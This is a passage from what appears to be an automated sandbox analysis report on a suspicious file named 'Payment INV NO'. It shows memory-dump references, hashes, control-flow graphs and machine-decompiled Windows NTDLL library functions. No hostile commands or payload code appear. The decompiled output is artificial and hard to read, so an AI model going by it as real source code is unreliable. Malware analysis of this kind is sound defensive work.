                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3a417ee6147c5067cf3751a1fd77be6b7b9ac2f3771770725815ddb35a0b3729
                                                          • Instruction ID: 1fb0ba01365de0e2ac63e258cb3b04397290cbed37b35244d66c392e78ca03f0
                                                          • Opcode Fuzzy Hash: 3a417ee6147c5067cf3751a1fd77be6b7b9ac2f3771770725815ddb35a0b3729
                                                          • Instruction Fuzzy Hash: 2090027120540406D1106199881871B4085A7D8382F51C021A5158556DC665886175B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6 17d96e0-17d96ec LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017C1765,000000FF,?,?,?,00000000,?,00000000,?,?,01802903,?,00008000,000000FF,?,00000000), ref: 017D96EA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 641c1a4b282e463753d60c78dc30ca2cca62708b7e39183fae3621b9d3234418
                                                          • Instruction ID: 40dc9fb80c0b05600722e5a65b12873f8a2a876b5d3d53d463d704c1ac9481c2
                                                          • Opcode Fuzzy Hash: 641c1a4b282e463753d60c78dc30ca2cca62708b7e39183fae3621b9d3234418
                                                          • Instruction Fuzzy Hash: 6B90027120508806D1206199C40875A4085A7D8381F55C421A8418659DC6D588A17161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004233B3 Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 12 4233b3-4233b6 13 4233be-4233c1 12->13
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.395619863.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Offset: 00423000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_423000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e0fa14252d61827cacaed210b281034bc2fadd4f7a3aae0c4df709769b83de6
                                                          • Instruction ID: 3d66d0bc4d2fbba08e27a9e7f5fc23b4682fc75e976c8cba849284d911a66b71
                                                          • Opcode Fuzzy Hash: 7e0fa14252d61827cacaed210b281034bc2fadd4f7a3aae0c4df709769b83de6
                                                          • Instruction Fuzzy Hash: 69A02220E0C30C03002030FA2A03022B30C800000CF0003FAAC0C022023C82B83A00EB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 01793ACA Relevance: 6.3, APIs: 4, Instructions: 348COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 237 1793aca-1793b0d call 17ed0e8 call 17b2280 242 1793b10-1793b15 237->242 243 1793b33-1793b4a 242->243 244 1793b17-1793b30 call 17affb0 call 17ed130 242->244 245 1793b4f-1793b6a 243->245 247 1793b6f-1793b77 245->247 249 1793b7d-1793b95 247->249 250 1793e6c-1793e6e 247->250 249->245 253 1793b97-1793b9a 249->253 250->247 253->245 254 1793b9c-1793bb2 253->254 254->245 255 1793bb4-1793bba 254->255 255->245 256 1793bbc-1793bed 255->256 257 1793bf3-1793bf5 256->257 258 1793d97-1793db5 call 17cdf4c 256->258 257->258 260 1793bfb-1793c02 257->260 264 1793dbb-1793dbe 258->264 265 17f0206-17f0213 RtlDebugPrintTimes 258->265 262 1793c08-1793c0b 260->262 263 1793dd1-1793dd7 260->263 268 1793c11-1793c14 262->268 269 1793dc3-1793dcb 262->269 266 1793ddd-1793de0 263->266 267 17f00c1-17f00c4 263->267 264->242 266->258 270 1793de2 266->270 267->268 271 17f00ca 267->271 272 17f00cf-17f00d2 268->272 273 1793c1a-1793c1d 268->273 269->263 269->268 270->268 271->272 272->273 275 17f00d8 272->275 276 1793e20-1793e23 273->276 277 1793c23-1793c8b call 17affb0 273->277 278 17f00da-17f00e0 275->278 279 17f00e6-17f00ef 275->279 276->277 280 1793e29 276->280 284 1793c91-1793c94 277->284 285 1793de7-1793dfd 277->285 278->273 278->279 279->258 283 17f00f5 279->283 280->258 283->273 286 1793c9a-1793cb5 call 1793e80 284->286 287 1793d23-1793d27 284->287 285->284 288 1793e03-1793e07 285->288 301 1793cde-1793ce3 286->301 302 1793cb7-1793cdb RtlDebugPrintTimes 286->302 290 1793d2d-1793d31 287->290 291 1793e0f-1793e1b call 17affb0 287->291 292 1793e09-1793e0a 288->292 293 1793e3b-1793e50 call 17b2280 288->293 296 17f01fe-17f0201 290->296 297 1793d37-1793d4f call 17b2280 290->297 291->290 298 1793d86-1793d8e 292->298 293->284 314 17f01de-17f01e2 297->314 315 1793d55-1793d5c 297->315 305 1793e2e-1793e36 call 17b2280 298->305 306 1793d94 298->306 309 1793ce9-1793cee 301->309 310 17f00fa-17f00fd 301->310 302->301 305->306 306->258 316 17f0139-17f0152 RtlDebugPrintTimes 309->316 317 1793cf4-1793cfb call 17b7d50 309->317 310->309 312 17f0103-17f0107 310->312 318 17f0109-17f010d 312->318 319 17f0113-17f0134 RtlDebugPrintTimes 312->319 320 17f01e8-17f01f7 314->320 321 1793d84 314->321 315->314 322 1793d62-1793d66 315->322 331 17f0157-17f0160 GetPEB 316->331 317->331 332 1793d01-1793d09 317->332 318->309 318->319 319->309 320->296 321->298 325 1793d6c-1793d72 322->325 326 1793e55-1793e60 322->326 330 1793d75-1793d79 325->330 326->325 329 1793e66 326->329 329->330 330->321 333 1793d7b-1793d7e 330->333 334 17f016a-17f0189 331->334 332->334 335 1793d0f-1793d1e call 1793e6b call 1793e80 332->335 333->321 336 17f01c7-17f01d9 333->336 334->336 335->287 336->321
                                                          C-Code - Quality: 69%
                                                          			E01793ACA(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t197;
				intOrPtr _t200;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t217;
				signed int _t224;
				signed int _t226;
				signed int _t229;
				signed int _t230;
				signed int _t233;
				intOrPtr _t238;
				signed int _t246;
				signed int _t249;
				char* _t252;
				intOrPtr _t257;
				signed int _t272;
				intOrPtr _t280;
				intOrPtr _t281;
				signed char _t286;
				signed int _t291;
				signed int _t292;
				intOrPtr _t299;
				intOrPtr _t301;
				signed int _t307;
				intOrPtr* _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t312;
				signed int* _t313;
				intOrPtr _t315;
				signed int _t316;
				void* _t317;

				_push(0x84);
				_push(0x186f4d0);
				E017ED0E8(__ebx, __edi, __esi);
				_t312 = __edx;
				 *((intOrPtr*)(_t317 - 0x38)) = __edx;
				 *((intOrPtr*)(_t317 - 0x20)) = __ecx;
				_t307 = 0;
				 *(_t317 - 0x74) = 0;
				 *((intOrPtr*)(_t317 - 0x78)) = 0;
				_t272 = 0;
				 *(_t317 - 0x60) = 0;
				 *((intOrPtr*)(_t317 - 0x68)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t197 = __edx + 0x28;
				 *((intOrPtr*)(_t317 - 0x7c)) = _t197;
				 *((intOrPtr*)(_t317 - 0x88)) = _t197;
				E017B2280(_t197, _t197);
				_t280 =  *((intOrPtr*)(_t312 + 0x2c));
				 *((intOrPtr*)(_t317 - 0x34)) = _t280;
				L1:
				while(1) {
					if(_t280 == _t312 + 0x2c) {
						E017AFFB0(_t272, _t307,  *((intOrPtr*)(_t317 - 0x7c)));
						asm("sbb ebx, ebx");
						return E017ED130( ~_t272 & 0xc000022d, _t307, _t312);
					}
					_t200 = _t280 - 4;
					 *((intOrPtr*)(_t317 - 0x70)) = _t200;
					 *((intOrPtr*)(_t317 - 0x8c)) = _t200;
					 *((intOrPtr*)(_t317 - 0x6c)) = _t200;
					_t308 = 0x7ffe0010;
					_t313 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x1888628; // 0x0
									 *(_t317 - 0x30) = _t201;
									_t202 =  *0x188862c; // 0x0
									 *(_t317 - 0x44) = _t202;
									 *(_t317 - 0x28) =  *_t313;
									 *(_t317 - 0x58) = _t313[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t281 =  *0x7ffe0008;
										__eflags = _t301 -  *_t308;
										if(_t301 ==  *_t308) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t313 = 0x7ffe03b0;
									_t309 =  *0x7ffe03b0;
									 *(_t317 - 0x40) = _t309;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t317 - 0x3c)) = _t206;
									__eflags =  *(_t317 - 0x28) - _t309;
									_t308 = 0x7ffe0010;
								} while ( *(_t317 - 0x28) != _t309);
								__eflags =  *(_t317 - 0x58) - _t206;
							} while ( *(_t317 - 0x58) != _t206);
							_t207 =  *0x1888628; // 0x0
							_t310 =  *0x188862c; // 0x0
							 *(_t317 - 0x28) = _t310;
							__eflags =  *(_t317 - 0x30) - _t207;
							_t308 = 0x7ffe0010;
						} while ( *(_t317 - 0x30) != _t207);
						__eflags =  *(_t317 - 0x44) -  *(_t317 - 0x28);
					} while ( *(_t317 - 0x44) !=  *(_t317 - 0x28));
					_t315 =  *((intOrPtr*)(_t317 - 0x6c));
					_t307 = 0;
					_t272 =  *(_t317 - 0x60);
					asm("sbb edx, [ebp-0x3c]");
					asm("sbb edx, eax");
					 *(_t317 - 0x28) = _t281 -  *(_t317 - 0x40) -  *(_t317 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x2c]");
					_t209 =  *((intOrPtr*)(_t317 - 0x20));
					_t286 =  *(_t315 + 0x24) &  *(_t209 + 0x18);
					 *(_t317 - 0x40) = _t286;
					__eflags =  *(_t315 + 0x34);
					if( *(_t315 + 0x34) != 0) {
						L37:
						 *((intOrPtr*)(_t317 - 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t317 - 0x34))));
						E017CDF4C(_t317 - 0x78, _t315, _t317 - 0x74, _t317 - 0x78);
						_t316 =  *(_t317 - 0x74);
						__eflags = _t316;
						_t280 =  *((intOrPtr*)(_t317 - 0x34));
						if(_t316 != 0) {
							 *0x188b1e0( *((intOrPtr*)(_t317 - 0x78)));
							 *_t316();
							_t280 =  *((intOrPtr*)(_t317 - 0x34));
						}
						_t312 =  *((intOrPtr*)(_t317 - 0x38));
						continue;
					}
					__eflags = _t286;
					if(_t286 == 0) {
						goto L37;
					}
					 *(_t317 - 0x5c) = _t286;
					_t45 = _t317 - 0x5c;
					 *_t45 =  *(_t317 - 0x5c) & 0x00000001;
					__eflags =  *_t45;
					if( *_t45 == 0) {
						L40:
						__eflags = _t286 & 0xfffffffe;
						if((_t286 & 0xfffffffe) != 0) {
							__eflags =  *((intOrPtr*)(_t315 + 0x64)) - _t307;
							if( *((intOrPtr*)(_t315 + 0x64)) == _t307) {
								L14:
								__eflags =  *(_t315 + 0x40) - _t307;
								if( *(_t315 + 0x40) != _t307) {
									__eflags = _t301 -  *(_t315 + 0x4c);
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t299 =  *((intOrPtr*)(_t317 - 0x20));
										__eflags =  *(_t315 + 0x5c) -  *((intOrPtr*)(_t299 + 0x10));
										if( *(_t315 + 0x5c) >=  *((intOrPtr*)(_t299 + 0x10))) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t317 - 0x28) -  *(_t315 + 0x48);
									if( *(_t317 - 0x28) >=  *(_t315 + 0x48)) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *((intOrPtr*)(_t317 + 8)) - _t307;
								if( *((intOrPtr*)(_t317 + 8)) != _t307) {
									__eflags =  *((intOrPtr*)(_t315 + 0x58)) - _t307;
									if( *((intOrPtr*)(_t315 + 0x58)) != _t307) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t317 - 0x24) = _t307;
								 *(_t317 - 0x30) = _t307;
								 *((intOrPtr*)(_t317 - 0x2c)) =  *((intOrPtr*)(_t315 + 0x10));
								_t217 =  *((intOrPtr*)(_t315 + 0xc));
								 *((intOrPtr*)(_t317 - 0x4c)) =  *((intOrPtr*)(_t217 + 0x10));
								 *((intOrPtr*)(_t317 - 0x48)) =  *((intOrPtr*)(_t217 + 0x14));
								 *(_t317 - 0x58) =  *(_t217 + 0x24);
								 *((intOrPtr*)(_t317 - 0x3c)) =  *((intOrPtr*)(_t315 + 0x14));
								 *((intOrPtr*)(_t317 - 0x64)) =  *((intOrPtr*)(_t315 + 0x18));
								 *(_t315 + 0x60) =  *( *[fs:0x18] + 0x24);
								_t224 =  *((intOrPtr*)(_t317 - 0x38)) + 0x28;
								 *(_t317 - 0x94) = _t224;
								_t291 = _t224;
								 *(_t317 - 0x28) = _t291;
								 *(_t317 - 0x90) = _t291;
								E017AFFB0(_t272, _t307, _t224);
								_t292 = _t307;
								 *(_t317 - 0x54) = _t292;
								_t226 = _t307;
								 *(_t317 - 0x50) = _t226;
								 *(_t317 - 0x44) = _t226;
								__eflags =  *(_t315 + 0x28);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t229 = 0;
									_t230 = _t229 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t317 - 0x50) = _t230;
									 *(_t317 - 0x44) = _t230;
									__eflags = _t230;
									if(_t230 != 0) {
										goto L17;
									}
									__eflags =  *((intOrPtr*)(_t317 + 8)) - 1;
									if( *((intOrPtr*)(_t317 + 8)) == 1) {
										E017B2280( *(_t315 + 0x28) + 0x10,  *(_t315 + 0x28) + 0x10);
										_t230 = 1;
										 *(_t317 - 0x50) = 1;
										 *(_t317 - 0x44) = 1;
										goto L17;
									}
									_t233 = _t230 + 1;
									L35:
									 *( *((intOrPtr*)(_t317 - 0x70)) + 0x58) = _t233;
									__eflags = _t292;
									if(_t292 == 0) {
										E017B2280(_t233,  *(_t317 - 0x28));
									}
									 *(_t315 + 0x60) = _t307;
									goto L37;
								}
								L17:
								__eflags =  *(_t315 + 0x34) - _t307;
								if( *(_t315 + 0x34) != _t307) {
									L26:
									__eflags =  *(_t317 - 0x50);
									if( *(_t317 - 0x50) != 0) {
										_t230 = E017AFFB0(_t272, _t307,  *(_t315 + 0x28) + 0x10);
									}
									__eflags =  *(_t317 - 0x30);
									if( *(_t317 - 0x30) == 0) {
										L71:
										_t292 =  *(_t317 - 0x54);
										L34:
										_t233 = _t307;
										goto L35;
									}
									E017B2280(_t230,  *(_t317 - 0x94));
									_t292 = 1;
									 *(_t317 - 0x54) = 1;
									__eflags =  *(_t317 - 0x24) - 0xc000022d;
									if( *(_t317 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t315 + 0x20) & 0x00000004;
										if(( *(_t315 + 0x20) & 0x00000004) == 0) {
											goto L34;
										}
										_t272 = 1;
										__eflags = 1;
										 *(_t317 - 0x60) = 1;
										L018230AE(_t315,  *(_t317 - 0x24),  *( *((intOrPtr*)(_t317 - 0x20)) + 0x10));
										goto L71;
									}
									__eflags =  *(_t317 - 0x24) - 0xc0000017;
									if( *(_t317 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t315 + 0x1c);
									if( *(_t315 + 0x1c) != 0) {
										_t238 =  *((intOrPtr*)(_t317 - 0x20));
										__eflags =  *((intOrPtr*)(_t238 + 0x10)) -  *(_t315 + 0x1c);
										if( *((intOrPtr*)(_t238 + 0x10)) -  *(_t315 + 0x1c) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t315 + 0x20) & 0x00000004;
										if(( *(_t315 + 0x20) & 0x00000004) != 0) {
											__eflags =  *(_t315 + 0x50) - _t307;
											if( *(_t315 + 0x50) > _t307) {
												 *(_t315 + 0x40) = _t307;
												 *(_t315 + 0x54) = _t307;
												 *(_t315 + 0x48) = _t307;
												 *(_t315 + 0x4c) = _t307;
												 *(_t315 + 0x50) = _t307;
												 *(_t315 + 0x5c) = _t307;
											}
										}
										goto L34;
									}
									L31:
									 *(_t315 + 0x1c) =  *( *((intOrPtr*)(_t317 - 0x20)) + 0x10);
									goto L32;
								}
								 *(_t317 - 0x30) = 1;
								 *((intOrPtr*)(_t317 - 0x80)) = 1;
								 *((intOrPtr*)(_t317 - 0x64)) = E01793E80( *((intOrPtr*)(_t317 - 0x64)));
								 *(_t317 - 4) = _t307;
								__eflags =  *(_t317 - 0x5c);
								if( *(_t317 - 0x5c) != 0) {
									_t257 =  *((intOrPtr*)(_t317 - 0x20));
									 *0x188b1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)),  *((intOrPtr*)(_t257 + 0x10)),  *(_t317 - 0x58),  *((intOrPtr*)(_t317 - 0x3c)),  *((intOrPtr*)(_t317 - 0x68)),  *((intOrPtr*)(_t257 + 0x14)));
									 *(_t317 - 0x24) =  *((intOrPtr*)(_t317 - 0x2c))();
								}
								_t246 =  *(_t317 - 0x40);
								__eflags = _t246 & 0x00000010;
								if((_t246 & 0x00000010) != 0) {
									__eflags =  *(_t315 + 0x34) - _t307;
									if( *(_t315 + 0x34) != _t307) {
										goto L21;
									}
									__eflags =  *(_t317 - 0x24);
									if( *(_t317 - 0x24) >= 0) {
										L64:
										 *0x188b1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)), _t307,  *(_t317 - 0x58),  *((intOrPtr*)(_t317 - 0x3c)), _t307, _t307);
										 *((intOrPtr*)(_t317 - 0x2c))();
										 *(_t317 - 0x24) = _t307;
										_t246 =  *(_t317 - 0x40);
										goto L21;
									}
									__eflags =  *(_t315 + 0x20) & 0x00000004;
									if(( *(_t315 + 0x20) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t246 & 0xffffffee;
									if((_t246 & 0xffffffee) != 0) {
										 *(_t317 - 0x24) = _t307;
										 *0x188b1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)),  *((intOrPtr*)(_t317 - 0x3c)), _t246);
										 *((intOrPtr*)(_t317 - 0x2c))();
									}
									_t249 = E017B7D50();
									__eflags = _t249;
									if(_t249 != 0) {
										_t252 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t252 = 0x7ffe038e;
									}
									__eflags =  *_t252;
									if( *_t252 != 0) {
										_t252 = L01822E14( *( *((intOrPtr*)(_t317 - 0x20)) + 0x10), _t315,  *((intOrPtr*)(_t317 - 0x38)),  *((intOrPtr*)(_t317 - 0x2c)),  *(_t317 - 0x40),  *(_t317 - 0x24),  *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)));
									}
									 *(_t317 - 4) = 0xfffffffe;
									E01793E6B(_t252);
									_t230 = E01793E80( *((intOrPtr*)(_t317 - 0x64)));
									goto L26;
								}
							}
						}
						__eflags = _t286 & 0x00000010;
						if((_t286 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t315 + 0x1c);
					if( *(_t315 + 0x1c) != 0) {
						__eflags =  *((intOrPtr*)(_t209 + 0x10)) -  *(_t315 + 0x1c);
						if( *((intOrPtr*)(_t209 + 0x10)) -  *(_t315 + 0x1c) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}






































                                                          0x01793aca
                                                          0x01793acf
                                                          0x01793ad4
                                                          0x01793ad9
                                                          0x01793adb
                                                          0x01793ae0
                                                          0x01793ae3
                                                          0x01793ae5
                                                          0x01793ae8
                                                          0x01793aeb
                                                          0x01793aed
                                                          0x01793af5
                                                          0x01793af8
                                                          0x01793afb
                                                          0x01793afe
                                                          0x01793b05
                                                          0x01793b0a
                                                          0x01793b0d
                                                          0x00000000
                                                          0x01793b10
                                                          0x01793b15
                                                          0x01793b1a
                                                          0x01793b21
                                                          0x01793b30
                                                          0x01793b30
                                                          0x01793b33
                                                          0x01793b36
                                                          0x01793b39
                                                          0x01793b3f
                                                          0x01793b47
                                                          0x01793b4a
                                                          0x01793b4a
                                                          0x01793b4f
                                                          0x01793b4f
                                                          0x01793b4f
                                                          0x01793b4f
                                                          0x01793b4f
                                                          0x01793b4f
                                                          0x01793b54
                                                          0x01793b57
                                                          0x01793b5c
                                                          0x01793b61
                                                          0x01793b67
                                                          0x01793b6f
                                                          0x01793b6f
                                                          0x01793b71
                                                          0x01793b75
                                                          0x01793b77
                                                          0x00000000
                                                          0x00000000
                                                          0x01793e6c
                                                          0x01793e6c
                                                          0x01793b7d
                                                          0x01793b7d
                                                          0x01793b82
                                                          0x01793b84
                                                          0x01793b87
                                                          0x01793b8a
                                                          0x01793b8d
                                                          0x01793b90
                                                          0x01793b90
                                                          0x01793b97
                                                          0x01793b97
                                                          0x01793b9c
                                                          0x01793ba1
                                                          0x01793ba7
                                                          0x01793baa
                                                          0x01793bad
                                                          0x01793bad
                                                          0x01793bb7
                                                          0x01793bb7
                                                          0x01793bbc
                                                          0x01793bbf
                                                          0x01793bc1
                                                          0x01793bc7
                                                          0x01793bcd
                                                          0x01793bd5
                                                          0x01793bd8
                                                          0x01793bda
                                                          0x01793be1
                                                          0x01793be4
                                                          0x01793be7
                                                          0x01793bea
                                                          0x01793bed
                                                          0x01793d97
                                                          0x01793d9c
                                                          0x01793da8
                                                          0x01793dad
                                                          0x01793db0
                                                          0x01793db2
                                                          0x01793db5
                                                          0x017f020b
                                                          0x017f0211
                                                          0x017f0213
                                                          0x017f0213
                                                          0x01793dbb
                                                          0x00000000
                                                          0x01793dbb
                                                          0x01793bf3
                                                          0x01793bf5
                                                          0x00000000
                                                          0x00000000
                                                          0x01793bfb
                                                          0x01793bfe
                                                          0x01793bfe
                                                          0x01793bfe
                                                          0x01793c02
                                                          0x01793dd1
                                                          0x01793dd1
                                                          0x01793dd7
                                                          0x017f00c1
                                                          0x017f00c4
                                                          0x01793c11
                                                          0x01793c11
                                                          0x01793c14
                                                          0x017f00cf
                                                          0x017f00d2
                                                          0x00000000
                                                          0x00000000
                                                          0x017f00d8
                                                          0x017f00e6
                                                          0x017f00e9
                                                          0x017f00ec
                                                          0x017f00ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f00f5
                                                          0x017f00dd
                                                          0x017f00e0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f00e0
                                                          0x01793c1a
                                                          0x01793c1a
                                                          0x01793c1d
                                                          0x01793e20
                                                          0x01793e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01793e29
                                                          0x01793c23
                                                          0x01793c23
                                                          0x01793c26
                                                          0x01793c2c
                                                          0x01793c2f
                                                          0x01793c35
                                                          0x01793c3b
                                                          0x01793c41
                                                          0x01793c47
                                                          0x01793c4d
                                                          0x01793c59
                                                          0x01793c5f
                                                          0x01793c62
                                                          0x01793c68
                                                          0x01793c6a
                                                          0x01793c6d
                                                          0x01793c74
                                                          0x01793c79
                                                          0x01793c7b
                                                          0x01793c7e
                                                          0x01793c80
                                                          0x01793c83
                                                          0x01793c89
                                                          0x01793c8b
                                                          0x01793dea
                                                          0x01793df1
                                                          0x01793df2
                                                          0x01793df5
                                                          0x01793df8
                                                          0x01793dfb
                                                          0x01793dfd
                                                          0x00000000
                                                          0x00000000
                                                          0x01793e03
                                                          0x01793e07
                                                          0x01793e42
                                                          0x01793e49
                                                          0x01793e4a
                                                          0x01793e4d
                                                          0x00000000
                                                          0x01793e4d
                                                          0x01793e09
                                                          0x01793d86
                                                          0x01793d89
                                                          0x01793d8c
                                                          0x01793d8e
